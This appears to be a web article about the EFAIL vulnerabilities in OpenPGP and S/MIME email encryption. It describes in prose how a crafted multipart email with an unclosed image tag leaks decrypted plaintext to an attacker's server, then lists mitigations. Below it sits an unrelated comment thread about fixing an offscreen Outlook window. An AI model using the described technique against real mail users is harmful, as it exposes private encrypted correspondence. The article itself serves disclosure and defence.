OpenPGP and S/Mime vulnerability EFAIL discovered
EFAIL is the name of a new set of vulnerabilities that allow attackers to exploit issues in OpenPGP and S/Mime to gain access to encrypted messages.
OpenPGP is an encryption standard that Internet users may use to protect sensitive data such as emails by using encryption. S/Mime is another standard that is widely used in corporate environments.
EFAIL requires that the attacker managed to gain access to encrypted emails and that the target runs client software that is vulnerable to one of the two available attack types.
An attacker could gain access to encrypted emails by monitoring network traffic, compromising email servers or the computers of users, or gaining access to backup servers.
The attack works in the following way:
- The attacker manages to get hold of an encrypted email.
- The encrypted email is modified and send to the target.
- The client used by the target decrypts the email and loads external content that transmits the plaintext message to the attacker.
The attacker may use two different types of attacks. The first is called direct exfiltration by the developers. It works in clients such as Mozilla Thunderbird, Postbox, MailMate, iOS Mail or Apple Mail and enables the attacker to exfiltrate the plaintext message of the encrypted email directly.
This attack works in the following way:
- The attacker creates a new multipart email message and prepares it in a special way. It consists of three parts:
- An HTML image tag that uses a src attribute that is opened with quotes but not closed.
- The actual encrypted message using PGP or S/Mime.
- The third part closes the open HTML tag of the first part.
- The message is send to the target.
- The target's email client processes the email. It loads the referenced image and attaches the plaintext message that it decrypted to the image URL.
- The attacker monitors hits to the server and gets hold of the secret message tis way.
The second attack type works against a larger number of email clients. In fact, the only clients protected against S/Mime attacks are Claws Mail and Mutt whereas more clients are protected against PGP-targeting attacks.
What can you do to protect yourself?
The researchers suggest the following mitigation strategies:
- Short Term: Disable decryption of S/Mime or PGP emails in the email client. Copy and paste the encrypted text into separate programs to decrypt the text.
- Short Term: Disable HTML rendering in the email client for all email messages.
- Medium Term: Software companies need to patch the issues in their client applications.
- Long Term: OpenPGP and S/Mime standards need to be updated.
While not explicitly mentioned, you may also disable the loading of remote content in the email client to prevent successful exploits.
Thunderbird users may want to check out our guide Switch Between HTML And Plain Text Emails In Thunderbird to enable plaintext email messages in the client. It is furthermore advised to disable the loading of any remote content by disabling "allow remote content in messages" under Tools > Options > Privacy.
Additional information about the vulnerability is available on the website the researchers created.
Now You: Do you use OpenPGP or S/Mime?
Related articles
- Getting started with ProtonMail
- How to encrypt your emails in Thunderbird
- Mailvelope: use OpenPGP encryption on Gmail, Yahoo, Hotmail and other webmail services
You said that Outlook isn’t your main email client, so which is your main one?
I think its thunderbird
It is Mozilla Thunderbird.
Awesome! This actually solved my problem… what a stupid bug.
If this is the same bug that I’ve encountered, there may be another fix: (1) hover over open Outlook item in Taskbar, cursor up to hover over Outlook window item, and right-click; (2) this should give you Restore / Move / Size / Minimize / Maximize — choose Move or Size; (3) use your cursor keys, going arbitrarily N/S/E/W, to try to move or size the Outlook window back into view. Basically, the app behaves as though it were open in a 0x0 window, or at a location that’s offscreen, and this will frequently work to resize and/or move the window. Don’t forget to close while resized/moved, so that Outlook remembers the size/position for next time.
THANK YOU Claude!!! I could get the main window to launch but could not get any other message window to show on the desktop. You are my hero!!!!
Solved my issue! 6 years later and this is still problem…
Fantastic. Thank you. Size did the trick.
This solved my Outlook problem, too. Thank you. :)
Thank you so much, this started happening to me today and was causing big problems. You are a life saver, I hope I can help you in some way some day.
You are a god – thank you!
thanks a lot…. work like charm.. :-)
Yah…thanks Claude. I’ve been having the same problem and tried all the suggestions…your solution was the answer. It had resized itself to a 0/0 box. Cheers
Excellent post. This had me baffled even trying to accurately describe the problem. This fixed it for me.
Thank you
Thanks a lot for the article. Don’t know why it happenend, don’t know how it got fixed, but it was really annoying and now it works :-)
Thanks a lot. I was facing this issue from past 3 week. I tried everything but no resolution. The issue was happening intermittently and mainly when I was changing the display of screen ( as i use 2 monitors). The only option i had was to do system restore. But thanks to you.
I’ve been tried to sole this problem for 12hours. Your comment about changing the display of screen helped me a lot!! Thanks!!
Thank you…don’t know why this happened but your instructions helped me fix it. Running Windows 10 and office pro 2007
Great tip! Thanks!
Worked for me, too – thank you!!!
It’s Worked for me, too
thank you very much!
I had a similar issue with Outlook 2013 on Windows 10 and this helped me to fix it. Thank you very much!
Thank you so much. Solved!
Considering you published this in 2012, incredible not been debugged by Microsoft.
Thank you again. M
This problem was faced by only one user logging to TS 2008 r2 using outlook 2010.The issue was resolved.
Thanks.
Great tip. Thank you!!!! If it helps, I had to use the Control Key and the arrow keys at the same time to bring my window back into view. Worked like a charm.
Thank you, this worked !!!!
Man, you are a fucking god. Thanks a lot, what an annoying bug!!
Awesome, this post solved the issue. Many thanks!